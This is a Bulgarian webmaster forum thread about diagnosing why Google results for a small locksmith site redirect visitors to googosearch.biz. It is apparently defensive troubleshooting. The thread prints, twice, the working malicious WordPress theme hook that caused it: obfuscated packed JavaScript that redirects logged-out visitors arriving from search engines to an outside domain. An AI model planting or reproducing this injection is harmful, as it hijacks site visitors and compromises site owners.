SearchEngines.bg

Това е примерно съобщение за гост. Регистрирайте безплатен акаунт днес, за да станете потребител на SearchEngines.bg! След като влезете, ще можете да участвате в този сайт, като добавите свои собствени теми и публикации, както и да се свържете с други членове чрез вашата лична входяща кутия! Благодарим ви!

резултат от Google ме препраща към googosearch.biz

Alexius

New member
Здравейте,
при търсене в Г по ключова дума "avtokluchar", третия резултат е мой, а именно avto-kluchar.info. Ако кликна върху него, ме прехвърля директно към:

http://googosearch.biz/search.php?terms=avtokluchar

Какво не е на ред?

Предполагам, за това Г не ми одобряваше рекламата в adwords?
 
Re: резултат от Google ме препраща към googosearch.biz

Я си провери сайта да не са те хакнали. Търси отклонения по JS скриптове и .htaccess файл. Както и в index.php или индексния файл на темата, която ползваш.
 
Re: резултат от Google ме препраща към googosearch.biz

Възможно е самият той да има "глезотийки" на компютъра. Преди известно време имах подобен проблем - на случаен принцип при търсене в Гугъл, когато цъкнех на някой резултат (различни сайтове) ме препращаше към някаква страница, която нямаше нищо общо. След Back и цъкане отново на резултата си влизах.

Malwarebytes' Anti-Malware си изтегли и си провери компютъра
 
Re: резултат от Google ме препраща към googosearch.biz

Проблема не е от неговия компютър. При мен се получава същото, виж си сайта специално индекса при другите страници го няма този проблем.
 
Re: резултат от Google ме препраща към googosearch.biz

Имал съм аналогичен случай, проблема беше в .htaccess както ти е писал и @s1yf0x
Имаше теми с описание, как да търсиш зловредният код на сайта, потърси.
Успех!
 
Re: резултат от Google ме препраща към googosearch.biz

Търсенето в Гугъл не е ли това http://www.google.bg/search?q=avtokluchar ?

Именно. Сега намери avto-kluchar.info в резултатите и кликни да видиш какво става...

Странното е, че като влезеш направо на сайта, няма пренасочване. Явно го прави само ако потребителя влезе през Г
 
Re: резултат от Google ме препраща към googosearch.biz

Да, точно това е. Като кликна върху сайта, започва да го зарежда и ме прехвърля към http://googosearch.biz/search.php?terms=avtokluchar
Понякога се зарежда нормално, понякога не. Ако напиша ръчно avto-kluchar.info, а не през Г се зарежда без проблем. Това се получава само при търсене през Г.

@KOBRETI ме изпревари
 
Re: резултат от Google ме препраща към googosearch.biz

Сайта ти е хакнат - прехваща referral googlecache и пренасочва. Не е нужно да пишеш на съпорта на хостинга, те ще ти върнат отговор.
 
Re: резултат от Google ме препраща към googosearch.biz

Проблема беше заразена тема на WordPress: wp-content/themes/<theme_name>/functions.php

А кода вътре е следния:
Код:
<?php
add_action('get_footer', 'add_sscounter');
       function add_sscounter(){
               echo '<!--scounter-->';
               if(function_exists('is_user_logged_in')){
                       if(time()%2 == 0 && !is_user_logged_in()){
                               echo "<script
language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e
r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
                       }
               }
       }
?>
 
Re: резултат от Google ме препраща към googosearch.biz

Здравейте,
Имам същия проблем, вкаран ми е същия код във functions.php и редиректва влизанията от търсачките към някакъв сайт. Махам кода 2-3 пъти и пак го слага след няколко дена. Как да защитя сайта за да няма достъп до functions.php? Някакви идеи?
 
Re: резултат от Google ме препраща към googosearch.biz

ACCESS DENIED
The requested URL could not be retrieved

While trying to retrieve the URL:

http://avto-kluchar.info/

The following threat was encountered:

The requested object is INFECTED with the following viruses: Trojan.JS.Redirector.ue
Generated:
12:16:01 ч.
Kaspersky Anti-Virus 2010

Ще трябва да почистиш темата добре :)
 
Последно редактирано от модератор:
Re: резултат от Google ме препраща към googosearch.biz

Проблема беше заразена тема на WordPress: wp-content/themes/<theme_name>/functions.php

А кода вътре е следния:
Код:
<?php
add_action('get_footer', 'add_sscounter');
       function add_sscounter(){
               echo '<!--scounter-->';
               if(function_exists('is_user_logged_in')){
                       if(time()%2 == 0 && !is_user_logged_in()){
                               echo "<script
language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e
r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
                       }
               }
       }
?>

Имам за трепене пак буби някакви :)
Този път редиректва към някакъв афф
 

Горе